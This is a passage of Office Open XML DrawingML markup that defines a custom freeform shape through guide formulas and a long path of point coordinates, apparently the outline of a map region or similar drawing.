                  <a:gd name="T5" fmla="*/ 680 h 692"/>
                  <a:gd name="T6" fmla="*/ 127 w 316"/>
                  <a:gd name="T7" fmla="*/ 689 h 692"/>
                  <a:gd name="T8" fmla="*/ 88 w 316"/>
                  <a:gd name="T9" fmla="*/ 686 h 692"/>
                  <a:gd name="T10" fmla="*/ 69 w 316"/>
                  <a:gd name="T11" fmla="*/ 617 h 692"/>
                  <a:gd name="T12" fmla="*/ 21 w 316"/>
                  <a:gd name="T13" fmla="*/ 580 h 692"/>
                  <a:gd name="T14" fmla="*/ 0 w 316"/>
                  <a:gd name="T15" fmla="*/ 554 h 692"/>
                  <a:gd name="T16" fmla="*/ 20 w 316"/>
                  <a:gd name="T17" fmla="*/ 517 h 692"/>
                  <a:gd name="T18" fmla="*/ 28 w 316"/>
                  <a:gd name="T19" fmla="*/ 491 h 692"/>
                  <a:gd name="T20" fmla="*/ 30 w 316"/>
                  <a:gd name="T21" fmla="*/ 445 h 692"/>
                  <a:gd name="T22" fmla="*/ 39 w 316"/>
                  <a:gd name="T23" fmla="*/ 435 h 692"/>
                  <a:gd name="T24" fmla="*/ 29 w 316"/>
                  <a:gd name="T25" fmla="*/ 409 h 692"/>
                  <a:gd name="T26" fmla="*/ 25 w 316"/>
                  <a:gd name="T27" fmla="*/ 384 h 692"/>
                  <a:gd name="T28" fmla="*/ 30 w 316"/>
                  <a:gd name="T29" fmla="*/ 343 h 692"/>
                  <a:gd name="T30" fmla="*/ 40 w 316"/>
                  <a:gd name="T31" fmla="*/ 301 h 692"/>
                  <a:gd name="T32" fmla="*/ 51 w 316"/>
                  <a:gd name="T33" fmla="*/ 256 h 692"/>
                  <a:gd name="T34" fmla="*/ 59 w 316"/>
                  <a:gd name="T35" fmla="*/ 212 h 692"/>
                  <a:gd name="T36" fmla="*/ 54 w 316"/>
                  <a:gd name="T37" fmla="*/ 152 h 692"/>
                  <a:gd name="T38" fmla="*/ 65 w 316"/>
                  <a:gd name="T39" fmla="*/ 112 h 692"/>
                  <a:gd name="T40" fmla="*/ 84 w 316"/>
                  <a:gd name="T41" fmla="*/ 89 h 692"/>
                  <a:gd name="T42" fmla="*/ 82 w 316"/>
                  <a:gd name="T43" fmla="*/ 72 h 692"/>
                  <a:gd name="T44" fmla="*/ 82 w 316"/>
                  <a:gd name="T45" fmla="*/ 46 h 692"/>
                  <a:gd name="T46" fmla="*/ 103 w 316"/>
                  <a:gd name="T47" fmla="*/ 19 h 692"/>
                  <a:gd name="T48" fmla="*/ 121 w 316"/>
                  <a:gd name="T49" fmla="*/ 2 h 692"/>
                  <a:gd name="T50" fmla="*/ 145 w 316"/>
                  <a:gd name="T51" fmla="*/ 7 h 692"/>
                  <a:gd name="T52" fmla="*/ 175 w 316"/>
                  <a:gd name="T53" fmla="*/ 4 h 692"/>
                  <a:gd name="T54" fmla="*/ 205 w 316"/>
                  <a:gd name="T55" fmla="*/ 35 h 692"/>
                  <a:gd name="T56" fmla="*/ 251 w 316"/>
                  <a:gd name="T57" fmla="*/ 59 h 692"/>
                  <a:gd name="T58" fmla="*/ 243 w 316"/>
                  <a:gd name="T59" fmla="*/ 85 h 692"/>
                  <a:gd name="T60" fmla="*/ 250 w 316"/>
                  <a:gd name="T61" fmla="*/ 91 h 692"/>
                  <a:gd name="T62" fmla="*/ 276 w 316"/>
                  <a:gd name="T63" fmla="*/ 92 h 692"/>
                  <a:gd name="T64" fmla="*/ 297 w 316"/>
                  <a:gd name="T65" fmla="*/ 80 h 692"/>
                  <a:gd name="T66" fmla="*/ 316 w 316"/>
                  <a:gd name="T67" fmla="*/ 75 h 692"/>
                  <a:gd name="T68" fmla="*/ 284 w 316"/>
                  <a:gd name="T69" fmla="*/ 114 h 692"/>
                  <a:gd name="T70" fmla="*/ 250 w 316"/>
                  <a:gd name="T71" fmla="*/ 157 h 692"/>
                  <a:gd name="T72" fmla="*/ 242 w 316"/>
                  <a:gd name="T73" fmla="*/ 204 h 692"/>
                  <a:gd name="T74" fmla="*/ 238 w 316"/>
                  <a:gd name="T75" fmla="*/ 226 h 692"/>
                  <a:gd name="T76" fmla="*/ 259 w 316"/>
                  <a:gd name="T77" fmla="*/ 244 h 692"/>
                  <a:gd name="T78" fmla="*/ 261 w 316"/>
                  <a:gd name="T79" fmla="*/ 263 h 692"/>
                  <a:gd name="T80" fmla="*/ 255 w 316"/>
                  <a:gd name="T81" fmla="*/ 293 h 692"/>
                  <a:gd name="T82" fmla="*/ 210 w 316"/>
                  <a:gd name="T83" fmla="*/ 314 h 692"/>
                  <a:gd name="T84" fmla="*/ 178 w 316"/>
                  <a:gd name="T85" fmla="*/ 322 h 692"/>
                  <a:gd name="T86" fmla="*/ 176 w 316"/>
                  <a:gd name="T87" fmla="*/ 343 h 692"/>
                  <a:gd name="T88" fmla="*/ 160 w 316"/>
                  <a:gd name="T89" fmla="*/ 361 h 692"/>
                  <a:gd name="T90" fmla="*/ 133 w 316"/>
                  <a:gd name="T91" fmla="*/ 362 h 692"/>
                  <a:gd name="T92" fmla="*/ 147 w 316"/>
                  <a:gd name="T93" fmla="*/ 388 h 692"/>
                  <a:gd name="T94" fmla="*/ 158 w 316"/>
                  <a:gd name="T95" fmla="*/ 393 h 692"/>
                  <a:gd name="T96" fmla="*/ 148 w 316"/>
                  <a:gd name="T97" fmla="*/ 391 h 692"/>
                  <a:gd name="T98" fmla="*/ 143 w 316"/>
                  <a:gd name="T99" fmla="*/ 398 h 692"/>
                  <a:gd name="T100" fmla="*/ 131 w 316"/>
                  <a:gd name="T101" fmla="*/ 416 h 692"/>
                  <a:gd name="T102" fmla="*/ 125 w 316"/>
                  <a:gd name="T103" fmla="*/ 442 h 692"/>
                  <a:gd name="T104" fmla="*/ 96 w 316"/>
                  <a:gd name="T105" fmla="*/ 464 h 692"/>
                  <a:gd name="T106" fmla="*/ 114 w 316"/>
                  <a:gd name="T107" fmla="*/ 491 h 692"/>
                  <a:gd name="T108" fmla="*/ 120 w 316"/>
                  <a:gd name="T109" fmla="*/ 514 h 692"/>
                  <a:gd name="T110" fmla="*/ 93 w 316"/>
                  <a:gd name="T111" fmla="*/ 545 h 692"/>
                  <a:gd name="T112" fmla="*/ 74 w 316"/>
                  <a:gd name="T113" fmla="*/ 570 h 692"/>
                  <a:gd name="T114" fmla="*/ 80 w 316"/>
                  <a:gd name="T115" fmla="*/ 617 h 692"/>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316"/>
                  <a:gd name="T175" fmla="*/ 0 h 692"/>
                  <a:gd name="T176" fmla="*/ 316 w 316"/>
                  <a:gd name="T177" fmla="*/ 692 h 692"/>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316" h="692">
                    <a:moveTo>
                      <a:pt x="77" y="643"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="77" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="643"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="77" y="643"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="685"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="643"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="81" y="621"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
